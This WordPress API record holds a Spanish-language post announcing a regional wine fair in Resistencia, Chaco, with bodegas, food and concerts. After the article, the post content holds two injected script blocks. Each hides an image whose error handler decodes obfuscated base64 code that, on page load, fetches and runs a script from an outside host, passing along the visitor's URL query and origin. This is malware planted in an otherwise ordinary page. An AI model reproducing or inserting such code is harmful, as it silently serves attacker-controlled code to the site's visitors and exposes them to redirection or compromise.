{"id":1287,"date":"2022-08-11T10:23:50","date_gmt":"2022-08-11T13:23:50","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1287"},"modified":"2025-08-14T00:38:43","modified_gmt":"2025-08-14T03:38:43","slug":"se-viene-la-expo-vinos-y-encantos-regionales-en-el-chaco","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1287","title":{"rendered":"Se viene la Expo Vinos y Encantos Regionales en el Chaco"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#a9042d\"><em>El evento fue distinguido por Marca Pa\u00eds, lo que contribuye a posicionarla a nivel nacional e internacional, d\u00e1ndole una mayor visibilidad.<\/em><\/h3>\n\n\n\n<p>La Expo Vinos y Encantos regionales, declarada de inter\u00e9s cultural a nivel provincial y municipal por onceava vez consecutiva, se realizar\u00e1 en la ciudad de Resistencia en la provincia de Chaco, brindando un marco cultural y tur\u00edstico, ya que convoca a las mejores bodegas del pa\u00eds y atrae a visitantes de toda la regi\u00f3n.<\/p>\n\n\n\n<p>Los d\u00edas 12 y 13 de agosto los salones del Gala Convenciones (Fray Bertaca 1750, Resistencia) brindar\u00e1n la ambientaci\u00f3n y comodidad para albergar a las m\u00e1s de 55 bodegas que formar\u00e1n parte de la feria y a los 6 mil visitantes de Argentina, Paraguay, Brasil y Uruguay que se esperan. Adem\u00e1s, cerrar\u00e1n las dos jornadas los espect\u00e1culos de Javier Calamaro, Catarina Spinetta y la artista internacional Julieta Venegas.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/expo_vinos-0349_original.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Por otro lado, la exposici\u00f3n tambi\u00e9n tendr\u00e1 mucha cocina aut\u00f3ctona, uno de los grandes atractivos que quiere promocionar la provincia, destacando a partir del vino la identidad de la gastronom\u00eda chaque\u00f1a y la producci\u00f3n local. As\u00ed, la exposici\u00f3n congrega tanto al sector p\u00fablico como al privado, empresarios y emprendedores que han sido parte de la iniciativa desde sus inicios.<\/p>\n\n\n\n<p>Cabe destacar que el Ministerio de Turismo y Deportes de la Naci\u00f3n distingui\u00f3 a la Expo Vinos y Encantos Regionales como un evento\u00a0<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/marca-pais\" target=\"_blank\" rel=\"noreferrer noopener\">Marca Pa\u00eds<\/a>, lo que contribuye a posicionarlo a nivel nacional e internacional, d\u00e1ndole una mayor visibilidad.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/expo_vinos-0741_original.jpg\" alt=\"\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El evento fue distinguido por Marca Pa\u00eds, lo que contribuye a posicionarla a nivel nacional e internacional, d\u00e1ndole una mayor visibilidad. La Expo Vinos y Encantos regionales, declarada de inter\u00e9s cultural a nivel provincial y municipal por onceava vez consecutiva, se realizar\u00e1 en la ciudad de Resistencia en la provincia de Chaco, brindando un marco [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1288,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24],"tags":[],"class_list":{"0":"post-1287","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1287"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1287"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1287\/revisions"}],"predecessor-version":[{"id":7397,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1287\/revisions\/7397"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1288"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1287"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1287"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1287"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}